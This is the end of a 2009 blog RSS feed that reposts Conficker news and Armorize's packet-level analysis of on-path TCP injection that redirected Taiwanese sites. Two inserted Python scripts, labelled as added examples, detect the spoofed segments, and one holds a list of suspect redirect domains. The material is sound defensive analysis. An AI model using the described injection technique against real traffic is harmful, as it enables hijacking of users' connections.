            &nbsp;&nbsp;&nbsp;  Although some characteristics of the Conficker worm have been uncovered, 360 Security Center's engineers also admit that it is still very difficult to locate the author. &ldquo;If the Conficker author takes no further action, it will be very hard to trace his real identity, but once he launches an attack the consequences will be unthinkable,&rdquo; a 360 security engineer said. &ldquo;Back then, criminals bought only 500 &lsquo;zombie&rsquo; computers and were able to paralyse a major domestic website's UT servers for more than 500 minutes; the infection count of the C variant alone is in the tens of millions.&rdquo; <br>
            <br>
            &nbsp;&nbsp;&nbsp;  Conficker's author suspected to be a Chinese hacker; Microsoft offers a US$250,000 bounty <br>
            <br>
            &nbsp;&nbsp;&nbsp;  The global digital-age panic created by Conficker is intensifying as April Fools' Day approaches. Surprisingly, domestic Internet users, who suffer heavily from trojans and viruses, have reported few Conficker infections. Data from 360 Security Center indicate that the number of domestic users' computers confirmed to have been infected by Conficker and its variants is only in the tens of thousands, negligible compared with the epidemic in Internet-developed countries, and yet Conficker's author may very well be a Chinese hacker! <br>
            <br>
            &nbsp;&nbsp;&nbsp;  Engineers at 360 Security Center said: &ldquo;The Conficker worm has appeared in several variants, A, B and C. According to analysis of the samples we collected, Conficker's disassembled code shows many characteristics of domestic trojans, and some functional modules even use classic code that circulates only among domestic technical people, so its author is very likely a domestic hacker.&rdquo; <br>
            <br>
            &nbsp;&nbsp;&nbsp;  &ldquo;Conficker mainly exploits the MS08-067 vulnerability; the detailed analysis of this vulnerability was first published on a domestic technical forum, and the attack code was first put into practice by the domestic Saodangbo (扫荡波) worm.&rdquo; On online forums, technical experts likewise regard the Conficker author as a mysterious figure who could appear in their midst at any time. It is understood that the author of the &ldquo;Sasser&rdquo; (震荡波) worm, which appeared in 2004, turned out to be a German hacker after Microsoft offered a US$250,000 bounty. This time, domestic hackers who have produced countless trojans may well find themselves in the spotlight because of the large reward. To catch the Conficker author, Microsoft has again offered a US$250,000 bounty, the same as for the Sasser author. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  If Conficker really was made by a domestic hacker, why has it achieved almost nothing at home? Is it mercy, or is there another reason? Microsoft China security researcher &ldquo;Daniuwa&rdquo; analysed it this way on his personal blog: &ldquo;Domestic security software with large user bases, such as 360, publicises and reminds users in various prominent ways and provides update methods suited to users' needs, which has greatly helped Windows users install patches in time (thanks for that); in addition, China has far fewer ISPs than other countries, and access policies for TCP 139/445 are set on backbone routers and key nodes, so the Chinese Internet is no longer a breeding ground for Conficker-type worms.&rdquo; <br>
            <br>
            &nbsp;&nbsp;&nbsp;  According to analysts, the &ldquo;trojan export theory&rdquo; popular on some hacker forums also provides strong support for the Conficker author being a domestic hacker. A user on the &ldquo;Heiyu Chengbao BBS&rdquo; (黑域城堡BBS) revealed: &ldquo;Security software is more and more widespread among domestic users, everyone realises the importance of patching, and &lsquo;zombies&rsquo; are much harder to catch than before. Making money from trojans domestically is getting harder; many people write trojans but cannot sell them, so they have no choice but to study English hard and switch to the export business.&rdquo; He even joked that &ldquo;if you really want to catch hackers, go to an English training class and you'll catch one every time&rdquo;. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  It is understood that the Microsoft IE XML 0day (MS08-078) vulnerability was first discovered, then sold, exploited and disclosed on the domestic Internet, yet in the end far more malicious sites were planted in the United States than in China. Coincidentally, when another popular piece of software, Adobe Acrobat Reader, had a 0day vulnerability this year, the Ghost trojan variant that was first to spread abroad is a common tool for controlling domestic &ldquo;zombies&rdquo; and very likely also the work of a domestic trojan author. From this it is inferred that the Conficker author being a domestic hacker is by no means far-fetched, just as a certain domestic hacker's advertisement put it: &ldquo;Good viruses, made in China&rdquo;. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  Dr. Shi Xiaohong, a 360 security expert, solemnly advised that domestic Internet companies must guard against the attack Conficker may launch: &ldquo;For most domestic users whose computers have been patched with 360, the Conficker worm actually poses little threat. But large websites that may become Conficker's targets are strongly advised to run a server-side stress test before April 1, just in case. In addition, the LANs of enterprises and institutions are where Conficker spreads easily; often one computer &lsquo;getting hit&rsquo; leads to a large-scale infection of the whole LAN. Besides using 360 to patch their computers as soon as possible, employees are advised to enable security software with a USB-drive firewall feature, such as 360, before using a USB drive.&rdquo;</p>
            </td>
        </tr>
        <tr>
            <td colspan="2">
            <div class="smallfontnoheight" align="right"><span class="smalltitle">Keywords</span>: Conficker worm</div>
            </td>
        </tr>
    </tbody>
</table>
</p>
]]></description>
        <pubDate>2009年03月26日 星期四  下午 01:31</pubDate>
        <category><![CDATA[安全技术]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/1add8dd63ab9a02706088b41.html</guid>
</item>

<item>
        <title><![CDATA[Large-Scale Web Hijacking and Redirection: The Threat Is Not Over, but the Experts All Guessed Wrong (repost)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/e2d4b8b745532cfc30add134.html]]></link>
        <description><![CDATA[
		
		<p>Reposted from &ldquo;http://armorize-cht.blogspot.com/2009/03/blog-post.html&rdquo;</p>
<p> </p>
<p>(For the sequel, see: <a target="_blank" href="http://hi.baidu.com/harite/blog/item/4c60a5c367c02a5db219a834.html"><font color="#e1771e">&ldquo;Large-Scale Web Hijacking and Redirection: The Mystery Solved&rdquo;</font></a><br>
)<br>
<br>
Since early March there have been reports online that when connecting to sites such as tw.msn.com and taiwan.cnet.com, users are automatically redirected to www.dachengkeji.com. At first I thought someone's DNS probably hadn't been patched again, or else there was another DNS 0-day or someone was playing with BGP again. Several days later the threat still had not gone away, and the media all reported on it:<br>
<br>
<a href="http://www.zdnet.com.tw/news/web/0,2000085679,20136641,00.htm"><font color="#e1771e">Mysterious web redirection incident suspected to be a new type of attack, ZDNet 2009/03/05</font></a><br>
<a href="http://news.networkmagazine.com.tw/secrutiy/2009/03/05/11128/"><font color="#e1771e">DNS compromised, many well-known websites intercepted and redirected, Network Magazine (網路資訊) 2009/03/05</font></a><br>
<a href="http://news.networkmagazine.com.tw/secruity/2009/03/07/11184/"><font color="#e1771e">[Tutorial] How to rescue yourself from an unexplained network hijack, Network Magazine (網路資訊) 2009/03/07</font></a><br>
<a href="http://news.networkmagazine.com.tw/secruity/2009/03/08/11190/"><font color="#e1771e">Follow-up: redirection attack continues and the malicious-code technique is maturing, Network Magazine (網路資訊) 2009/03/08</font></a><br>
<a href="http://www.ithome.com.tw/itadm/article.php?c=53832"><font color="#e1771e">Microsoft MSN homepage redirected; upstream DNS suspected compromised, iThome 2009/03/06</font></a><br>
<br>
Hmm, so many experts said DNS had been hijacked, the same as my intuition... that is what I thought at the time.<br>
<br>
At noon on March 7, I went online from a computer whose IE homepage had not been changed and was still set to MSN, and as soon as I opened it I really was hijacked to dachengkeji. This dachengkeji.com is really something, I thought; after so many days the threat still has not been resolved. Just then, fyodor yarochkin of <a href="http://armorize-cht.blogspot.com/2009/03/o0o.nu"><font color="#e1771e">o0o.nu</font></a> (contact: fygrave at o0o dot nu) messaged me on MSN and told me that the recent redirection incident, claimed to be a &ldquo;DNS hijack&rdquo;, had nothing to do with DNS at all. That piqued my curiosity, so I looked at the packets with WireShark and was astonished to find that this was definitely not an ordinary DNS hijack; the attacker's technique is sharp, and the scope of impact should be very large! I am sharing fyodor's and my research with you here, and if you have ideas, please let us know.<br>
<br>
This attack uses two techniques:<br>
<br>
(1) <a href="http://www.networkdictionary.com/security/ipspoofing.php"><font color="#e1771e">Non-blind spoofing</font></a>, which also means the attack program sits on the path between the victim and the targeted website and can monitor the traffic.<br>
<br>
(2) A flaw (bug) in some TCP/IP stack implementations; current testing shows Microsoft's systems have this flaw, but other operating systems are expected to have it too.<br>
<br>
I will use the packets I recorded with WireShark to explain the attack technique. At the time I was trying to connect to http://www.gogrok.com (because a netizen said this site was also targeted for redirection). My IP at the time was 192.168.1.129, and gogrok's was 202.157.128.202.<br>
Below we look at frame 15: my machine sends a SYN to gogrok.<br>
<br>
<a href="http://4.bp.blogspot.com/_hELDi5B8zOI/SbSC5rC394I/AAAAAAAABU8/s30_z_win74/s1600-h/spoof_1.png"><img style="text-align: center; margin: 0px auto 10px; display: block; cursor: hand" border="0" src="http://4.bp.blogspot.com/_hELDi5B8zOI/SbSC5rC394I/AAAAAAAABU8/s30_z_win74/s1600/spoof_1.png"></a><br>
<br>
<span class="fullpost"><br>
In frame 16, the other side sends SYN/ACK; note that its TTL is 56.<br>
<br>
<a href="http://3.bp.blogspot.com/_hELDi5B8zOI/SbSDuUl7tDI/AAAAAAAABVE/x3dBC9sIehA/s1600-h/spoof_2.png"><img style="text-align: center; margin: 0px auto 10px; display: block; cursor: hand" border="0" src="http://3.bp.blogspot.com/_hELDi5B8zOI/SbSDuUl7tDI/AAAAAAAABVE/x3dBC9sIehA/s1600/spoof_2.png"></a><br>
<br>
Frame 17: I send ACK, the three-way handshake completes and the connection is established. Frame 18: I send the HTTP request; the request (GET) is not especially long, so it fits in a single packet. Note TCP s/n=752:<br>
<br>
<a href="http://3.bp.blogspot.com/_hELDi5B8zOI/SbSFiavLDNI/AAAAAAAABVM/UVFHMQ7dcGM/s1600-h/spoof_4.png"><img style="text-align: center; margin: 0px auto 10px; display: block; cursor: hand" border="0" src="http://3.bp.blogspot.com/_hELDi5B8zOI/SbSFiavLDNI/AAAAAAAABVM/UVFHMQ7dcGM/s1600/spoof_4.png"></a><br>
<br>
Frame 19: the other side responds. The s/n is correct (752), but id=0x0100; too much of a coincidence? The TTL has also suddenly become 115. The key point is that this packet has FIN set, and the HTTP response content is a meta refresh redirect. FIN means the other side wants to close the connection, and the meta refresh causes my browser to redirect to www.zhonglie.org. This packet does not actually conform to <a href="http://www.ietf.org/rfc/rfc0793.txt"><font color="#e1771e">RFC 793</font></a>: SYN/FIN packets must not carry other payload; all payload should be exchanged after the three-way handshake completes and before FIN.<br>
<br>
<a href="http://2.bp.blogspot.com/_hELDi5B8zOI/SbSMHYXWU0I/AAAAAAAABVk/bi6USE05-qI/s1600-h/spoof_4_1.png"><img style="text-align: center; margin: 0px auto 10px; display: block; cursor: hand" border="0" src="http://2.bp.blogspot.com/_hELDi5B8zOI/SbSMHYXWU0I/AAAAAAAABVk/bi6USE05-qI/s1600/spoof_4_1.png"></a><br>
<br>
Frames 20-21: my side confirms the connection teardown. Frame 23 is the ACK sent by the genuine site; the s/n is correct (752), the TTL is also 56, and id=0x2087, not 0x0100. But it arrived later; my machine already considered the connection closed, and the browser had already been redirected.<br>
<br>
<a href="http://2.bp.blogspot.com/_hELDi5B8zOI/SbSNximxTsI/AAAAAAAABVs/UYtR0Z6J9D8/s1600-h/spoof_6.png"><img style="text-align: center; margin: 0px auto 10px; display: block; cursor: hand" border="0" src="http://2.bp.blogspot.com/_hELDi5B8zOI/SbSNximxTsI/AAAAAAAABVs/UYtR0Z6J9D8/s1600/spoof_6.png"></a><br>
<br>
<strong>The characteristics of this attack are: first, it has the correct s/n, which shows the attack program is on the route and can see the packets. Second, it exploits a flaw in some operating systems' (e.g. Microsoft's) TCP/IP stack implementation, so the whole attack is done with a single packet, clean and neat.</strong><br>
<br>
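<p>As an added example (not part of the original post or of Armorize's work), the indicators in frames 16 to 23 above can be checked offline on a decoded trace: a server-to-client segment whose TTL differs from the SYN/ACK's TTL, a fixed IP ID of 0x0100, FIN carried together with a meta-refresh payload, and a later segment from the real server for the same sequence number. The frame records below are constructed from the values the post quotes; the client-side fields and the relative sequence numbers are made up.</p>

```python
"""Offline detector for the in-path TCP response spoofing walked through above:
the forged reply carries the right sequence number but a TTL different from the
server's SYN/ACK, a fixed IP ID (0x0100 in the capture), FIN together with a
meta-refresh payload, and the real server's segment for the same sequence
number arrives later.

Added example, not from the original post or from Armorize. The frame records
are constructed from the values quoted in the post (frames 15-23); sequence
numbers are relative and the client-side fields are made up.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Frame:
    num: int
    src: str
    dst: str
    ttl: int
    ip_id: int
    flags: str          # TCP flags as letters: S, A, F, P
    seq: int            # relative sequence number
    payload: bytes = b""


@dataclass
class ConnState:
    server_ttl: int                           # TTL seen in the server's SYN/ACK
    seen_seq: Dict[int, Frame] = field(default_factory=dict)


def analyse(frames: List[Frame], ttl_tolerance: int = 2) -> Dict[int, List[str]]:
    """Return {frame number: reasons} for server->client segments with at least
    two independent indicators of forgery. Ordinary retransmissions (same seq,
    same TTL) do not trigger the duplicate-sequence check."""
    conns: Dict[Tuple[str, str], ConnState] = {}     # (client, server) -> state
    reasons: Dict[int, List[str]] = defaultdict(list)
    for f in frames:
        if "S" in f.flags and "A" in f.flags:
            conns[(f.dst, f.src)] = ConnState(server_ttl=f.ttl)
            continue
        st = conns.get((f.dst, f.src))   # only server->client frames match
        if st is None or "S" in f.flags:
            continue
        base = st.server_ttl
        if abs(f.ttl - base) > ttl_tolerance:
            reasons[f.num].append(f"TTL {f.ttl} differs from handshake TTL {base}")
        if f.ip_id == 0x0100:
            reasons[f.num].append("fixed IP ID 0x0100")
        if "F" in f.flags and f.payload:
            reasons[f.num].append("FIN carried in the first data segment")
        if b'http-equiv="refresh"' in f.payload.lower():
            reasons[f.num].append("meta refresh redirect in payload")
        prev = st.seen_seq.get(f.seq)
        if prev is not None and prev.ttl != f.ttl:
            # Two senders answered the same sequence number: blame the one whose
            # TTL is farther from the handshake baseline.
            culprit, other = ((prev, f) if abs(prev.ttl - base) >= abs(f.ttl - base)
                              else (f, prev))
            reasons[culprit.num].append(
                f"seq {f.seq} also answered by frame {other.num} with TTL {other.ttl}")
        st.seen_seq.setdefault(f.seq, f)
    return {num: r for num, r in reasons.items() if len(r) >= 2}


CLIENT, SERVER = "192.168.1.129", "202.157.128.202"
FORGED_BODY = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
               b'<html><head><meta http-equiv="refresh" '
               b'content="0;url=http://www.zhonglie.org/"></head></html>')
REQUEST = b"GET / HTTP/1.1\r\nHost: www.gogrok.com\r\n\r\n"

# Constructed trace modelled on the post's frames 15-23 (frame 22 omitted).
TRACE = [
    Frame(15, CLIENT, SERVER, ttl=128, ip_id=0x1A2B, flags="S", seq=0),
    Frame(16, SERVER, CLIENT, ttl=56, ip_id=0x2085, flags="SA", seq=0),
    Frame(17, CLIENT, SERVER, ttl=128, ip_id=0x1A2C, flags="A", seq=1),
    Frame(18, CLIENT, SERVER, ttl=128, ip_id=0x1A2D, flags="PA", seq=1, payload=REQUEST),
    Frame(19, SERVER, CLIENT, ttl=115, ip_id=0x0100, flags="FPA", seq=1, payload=FORGED_BODY),
    Frame(20, CLIENT, SERVER, ttl=128, ip_id=0x1A2E, flags="A", seq=len(REQUEST) + 1),
    Frame(21, CLIENT, SERVER, ttl=128, ip_id=0x1A2F, flags="FA", seq=len(REQUEST) + 1),
    Frame(23, SERVER, CLIENT, ttl=56, ip_id=0x2087, flags="A", seq=1),
]
```

`analyse(TRACE)` flags only frame 19, with five reasons; the genuine frame 23 is not flagged, but its arrival adds the duplicate-sequence reason to frame 19.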
Many netizens have been discussing it online:<br>
<a href="http://www.mobile01.com/topicdetail.php?f=300&amp;t=962543&amp;p=1"><font color="#e1771e">&ldquo;Connecting to tw.msn.com redirects to http://www.dachengkeji.com/article/index.htm&rdquo;</font></a><br>
<a href="http://forum.icst.org.tw/phpbb/viewtopic.php?f=20&amp;t=16458"><font color="#e1771e">&ldquo;Connecting to the MSN homepage redirects to www.dachengkeji.com/article/index.htm&rdquo;</font></a><br>
<a href="http://ithelp.ithome.com.tw/question/10018209"><font color="#e1771e">&ldquo;Entering the iThome Blog URL automatically jumps to an advertising URL&rdquo;</font></a><br>
<a href="http://www.avpclub.ddns.info/discuz/viewthread.php?action=printable&amp;tid=16878"><font color="#e1771e">&ldquo;[Help] Connecting to tw.msn.com redirects to http://www.dachengkeji.com/article/index.htm&rdquo;</font></a><br>
<a href="http://forum.92an.com/t12036/"><font color="#e1771e">&ldquo;Is there a way to check whether this site's DNS has been hacked?&rdquo;</font></a> (this domain is itself targeted; be careful when clicking!)<br>
<a href="http://kkbruce.blogspot.com/2009/03/twmsncom.html"><font color="#e1771e">&ldquo;Has tw.msn.com been compromised?&rdquo;</font></a><br>
<a href="http://forum.moztw.org/viewtopic.php?p=143681#143681"><font color="#e1771e">&ldquo;Random redirection&rdquo;</font></a><br>
<a href="http://blog.yam.com/zhiqingblog/article/19778531"><font color="#e1771e">&ldquo;Blocking the annoying &quot;www.dachengkeji.com&quot; Dacheng Technology&rdquo;</font></a><br>
<a href="http://www.cadch.com/modules/news/article.php?storyid=239&amp;uid=1"><font color="#e1771e">&ldquo;Site news: Reactions to tw.msn.com being redirected to the dachengkeji site have spread to our customers&rdquo;</font></a><br>
<a href="http://www.gohome.idv.tw/viewtopic.php?p=75404#75404"><font color="#e1771e">&ldquo;[Important] Connecting to the MSN homepage redirects to www.dachengkeji.com/article/index.htm&rdquo;</font></a><br>
<a href="http://bbs.ngacn.cc/read.php?tid=2242937&amp;page=e"><font color="#e1771e">&ldquo;[Question] Has the Taiwan server's official website been hotlinked by someone? See the screenshot&rdquo;</font></a><br>
<a href="http://map.answerbox.net/landmark-919078.htm"><font color="#e1771e">&ldquo;Computer alert: web pages auto-redirecting without infection (updated 3/10)&rdquo;</font></a><br>
<a href="http://social.technet.microsoft.com/Forums/zh-TW/iezhcht/thread/2386d923-0c40-478b-b590-1454d7e3bb7e#page:2"><font color="#e1771e">&ldquo;Connecting to tw.msn.com redirects to http://www.dachengkeji.com/article/index.htm&rdquo;</font></a><br>
<a href="http://stary9.pixnet.net/blog/post/24472102"><font color="#e1771e">Web hijacking</font></a><br>
<br>
These discussions and reports, and some of what the interviewed experts said, are not correct. This attack has nothing to do with DNS. <strong>Also, so far the threat has not ended or diminished!</strong> Between 2 and 3 p.m. on March 7, I ran some tests on the computer I was using and found that every time I connected to tw.msn.com I was redirected. But from about 4 p.m. it suddenly stopped redirecting; I thought the threat was probably over and the infected router had been fixed. Yet at noon on March 8 I found the threat was still there, but for each targeted URL it redirects only once! That is, say you are at home: only the first time you connect to a targeted site will you be redirected; the second time it will not happen at all. This is why what I recorded is gogrok.com rather than tw.msn.com: after redirecting once, it no longer redirected. I tried many targeted URLs and they were all the same; only the first time redirects.<br>
<br>
The analyses online closest to ours are Blue's post on 資安之眼, <a href="http://www.itis.tw/node/2591"><font color="#e1771e">「On the redirect attacks of the past two days」</font></a>, and richliu's blog post <a href="http://blog.richliu.com/2009/03/05/743/"><font color="#e1771e">「Some ISPs suspected of being under a hijacking attack」</font></a>. In addition, on mobile01, <a href="http://www.mobile01.com/userinfo.php?id=858326"><font color="#e1771e">powerpcer</font></a> posted his pcap dump; we have looked at it and the technique is the same as in what we captured.<br>
<br>
Cisco also posted an alert on March 6:<br>
<a href="http://tools.cisco.com/security/center/viewAlert.x?alertId=17778"><font color="#e1771e">CISCO:TCP Traffic on Chinese Networks Redirected to Malicious Websites</font></a><br>
<br>
We are collecting the information related to this incident here; if readers have anything to add, please leave a comment or email us (wayne [at] armorize [dot] com)!<br>
<br>
<strong>[Attack technique]</strong><br>
(1) <a href="http://www.networkdictionary.com/security/ipspoofing.php"><font color="#e1771e">Non-blind spoofing</font></a>, which also means the attack program sits on the path between the victim and the targeted website and can sniff the traffic.<br>
(2) A flaw (bug) in some TCP/IP stack implementations; our tests so far show Microsoft's systems have this flaw, but other operating systems are expected to have it as well.<br>
<br>
<strong>[Attack characteristics]</strong><br>
(1) The attack program sits on the route, very likely on the backbone, so the scope of impact is wide.<br>
(2) A single packet is enough to hijack the session.<br>
(3) Since the revised version, each URL is redirected only once, which makes tracking difficult.<br>
(4) The technique is not the "DNS infection" that many experts are currently claiming.<br>
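As an added defender-side example (not code from the Armorize post), the following Python flags the two symptoms of the on-path injection described above in a list of captured segments: a segment whose sequence number collides with an earlier one in the same flow but carries different data, and an HTTP redirect to one of the destination domains named in this post. The Segment record, the addresses and the three sample segments are constructed for the example.

```python
from collections import namedtuple
import re

# Hypothetical minimal record of one TCP segment (a real tool fills it from a pcap).
Segment = namedtuple("Segment", "src sport dst dport seq ttl payload")

# Redirect destinations listed in the post.
SUSPECT_HOSTS = {"www.dachengkeji.com", "www.zhonglie.org", "www.yyge.com", "www.ganji.com"}
LOCATION_RE = re.compile(rb"^Location:\s*https?://([^/\r\n:]+)", re.I | re.M)

def analyse(segments):
    """Return findings (dicts with a 'reason' key) for two indicators.
    1. Two data segments of one flow share a sequence number but carry different
       bytes: a real retransmission repeats the same bytes, so one of the pair
       was injected by a third party (the spoofed 302 wins the race, the genuine
       200 arrives later). Both IP TTLs are reported because a box in the middle
       of the path rarely matches the server's TTL.
    2. An HTTP Location header pointing at one of the suspect domains."""
    first_seen, findings = {}, []
    for seg in segments:
        if not seg.payload:
            continue
        key = (seg.src, seg.sport, seg.dst, seg.dport, seg.seq)
        earlier = first_seen.setdefault(key, seg)
        if earlier is not seg and earlier.payload != seg.payload:
            findings.append({"reason": "conflicting-payload", "seq": seg.seq,
                             "ttl_first": earlier.ttl, "ttl_second": seg.ttl})
        m = LOCATION_RE.search(seg.payload)
        if m:
            host = m.group(1).decode("ascii", "replace").lower()
            if host in SUSPECT_HOSTS:
                findings.append({"reason": "redirect-to-suspect-host", "host": host})
    return findings

def sample_capture():
    """Constructed three-segment exchange modelled on the post's description;
    addresses are documentation ranges, not the real hosts."""
    c, s = "192.0.2.10", "198.51.100.5"
    return [
        Segment(c, 51000, s, 80, 1, 128, b"GET / HTTP/1.1\r\nHost: tw.msn.com\r\n\r\n"),
        # Injected by the on-path attacker: same seq as the real reply, other TTL.
        Segment(s, 80, c, 51000, 1, 58, b"HTTP/1.1 302 Found\r\n"
                b"Location: http://www.dachengkeji.com/article/index.htm\r\n\r\n"),
        # The genuine reply, which now looks like a retransmission with other data.
        Segment(s, 80, c, 51000, 1, 113,
                b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>MSN</html>"),
    ]
```

Running analyse(sample_capture()) yields one redirect finding for the injected 302 and one conflicting-payload finding when the genuine 200 arrives with TTL 113 against the spoofed segment's 58.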
<br>
<strong>[Domains targeted for redirection]</strong><br>
According to reports from users, the domains currently known to be targeted for redirection are:<br>
tw.msn.com (we reproduced this in our own tests)<br>
www.msn.com.tw<br>
www.gogrok.com (we reproduced this in our own tests)<br>
taiwan.cnet.com (we reproduced this in our own tests)<br>
www.orzteam.com<br>
www.92an.com<br>
www.wowtaiwan.com.tw<br>
www.ioage.com<br>
www.ithome.com.tw<br>
<br>
<strong>[Domains redirected to]</strong><br>
The redirect destinations are:<br>
www.dachengkeji.com<br>
www.zhonglie.org<br>
www.yyge.com<br>
www.ganji.com<br>
<br>
<strong>[pcap capture download]</strong><br>
We have three packet captures, for msn.com, cnet.com and gogrok, recorded while being spoofed; contact us to request them (wayne [at] armorize [dot] com).<br>
<br>
<strong>[How to protect yourself]</strong><br>
Because a node on the path has been compromised, users cannot easily protect themselves; we recommend connecting to websites over https rather than http (if the site offers https). If you are worried that your machine was attacked and had malware planted after being redirected, you can write to request Armorize's free Archon Scanner: info [at] armorize [dot] com.<br>
<br>
<strong>[Security vendor alerts]</strong><br>
<a href="http://tools.cisco.com/security/center/viewAlert.x?alertId=17778"><font color="#e1771e">CISCO:TCP Traffic on Chinese Networks Redirected to Malicious Websites</font></a><br>
<br>
<strong>[Related news]</strong><br>
<a href="http://www.zdnet.com.tw/news/web/0,2000085679,20136641,00.htm"><font color="#e1771e">1. Mysterious web redirect incident suspected to be a new type of attack technique, ZDNet 2009/03/05</font></a><br>
<a href="http://news.networkmagazine.com.tw/secrutiy/2009/03/05/11128/"><font color="#e1771e">2. DNS compromised, many well-known websites intercepted and redirected, 網路資訊 2009/03/05</font></a><br>
<a href="http://news.networkmagazine.com.tw/secruity/2009/03/07/11184/"><font color="#e1771e">[Tutorial] How to help yourself when hit by unidentified network hijacking, 網路資訊 2009/03/07</font></a><br>
<a href="http://news.networkmagazine.com.tw/secruity/2009/03/08/11190/"><font color="#e1771e">Follow-up: redirect attacks continue and the malicious code's technique is maturing, 網路資訊 2009/03/08</font></a><br>
<a href="http://www.ithome.com.tw/itadm/article.php?c=53832"><font color="#e1771e">Microsoft MSN home page redirected; upstream DNS suspected compromised, IThome 2009/03/06</font></a><br>
<br>
<strong>[Related online discussions]</strong><br>
<a href="http://www.mobile01.com/topicdetail.php?f=300&amp;t=962543&amp;p=1"><font color="#e1771e">「Visiting tw.msn.com redirects to http://www.dachengkeji.com/article/index.htm」</font></a><br>
<a href="http://forum.icst.org.tw/phpbb/viewtopic.php?f=20&amp;t=16458"><font color="#e1771e">「Visiting the MSN home page redirects to www.dachengkeji.com/article/index.htm」</font></a><br>
<a href="http://ithelp.ithome.com.tw/question/10018209"><font color="#e1771e">「Opening the iThome Blog URL automatically jumps to an advertising URL」</font></a><br>
<a href="http://www.avpclub.ddns.info/discuz/viewthread.php?action=printable&amp;tid=16878"><font color="#e1771e">「[Help] Visiting tw.msn.com redirects to http://www.dachengkeji.com/article/index.htm」</font></a><br>
<a href="http://forum.92an.com/t12036/"><font color="#e1771e">「Is there a way to check whether this site's DNS has been hacked?」</font></a> (this domain is itself targeted; click with care!)<br>
<a href="http://kkbruce.blogspot.com/2009/03/twmsncom.html"><font color="#e1771e">「Has tw.msn.com been compromised?」</font></a><br>
<a href="http://forum.moztw.org/viewtopic.php?p=143681#143681"><font color="#e1771e">「Random redirects」</font></a><br>
<a href="http://blog.yam.com/zhiqingblog/article/19778531"><font color="#e1771e">「Blocking the annoying &quot;www.dachengkeji.com&quot; (大乘科技)」</font></a><br>
<a href="http://www.cadch.com/modules/news/article.php?storyid=239&amp;uid=1"><font color="#e1771e">「Site news: reactions to tw.msn.com being redirected to the dachengkeji site have spread to our customers」</font></a><br>
<a href="http://www.gohome.idv.tw/viewtopic.php?p=75404#75404"><font color="#e1771e">「[Important] Visiting the MSN home page redirects to www.dachengkeji.com/article/index.htm」</font></a><br>
<a href="http://bbs.ngacn.cc/read.php?tid=2242937&amp;page=e"><font color="#e1771e">「[Question] Is the Taiwan server's official website being inline-linked by someone else? See the screenshot」</font></a><br>
<a href="http://map.answerbox.net/landmark-919078.htm"><font color="#e1771e">「Computer alert: automatic web redirects that are not a virus infection (updated 3/10)」</font></a><br>
<a href="http://social.technet.microsoft.com/Forums/zh-TW/iezhcht/thread/2386d923-0c40-478b-b590-1454d7e3bb7e#page:2"><font color="#e1771e">「Visiting tw.msn.com redirects to http://www.dachengkeji.com/article/index.htm」</font></a><br>
<a href="http://stary9.pixnet.net/blog/post/24472102"><font color="#e1771e">Web hijacking</font></a><br>
<br>
Author Wayne is CEO of <a href="http://www.armorize.com/"><font color="#e1771e">Armorize (阿碼科技)</font></a><br>
Author Fyodor Yarochkin is a member of <a href="http://www.o0o.nu/"><font color="#e1771e">o0o.nu</font></a><br>
<br>
Sequel: <a target="_blank" href="http://hi.baidu.com/harite/blog/item/4c60a5c367c02a5db219a834.html"><font color="#e1771e">「Large-scale web hijacking and redirection: the truth comes out」</font></a><br>
</span></p>
]]></description>
        <pubDate>Friday, March 13, 2009, 08:15 PM</pubDate>
        <category><![CDATA[Security technology]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/e2d4b8b745532cfc30add134.html</guid>
</item>


</channel>
</rss>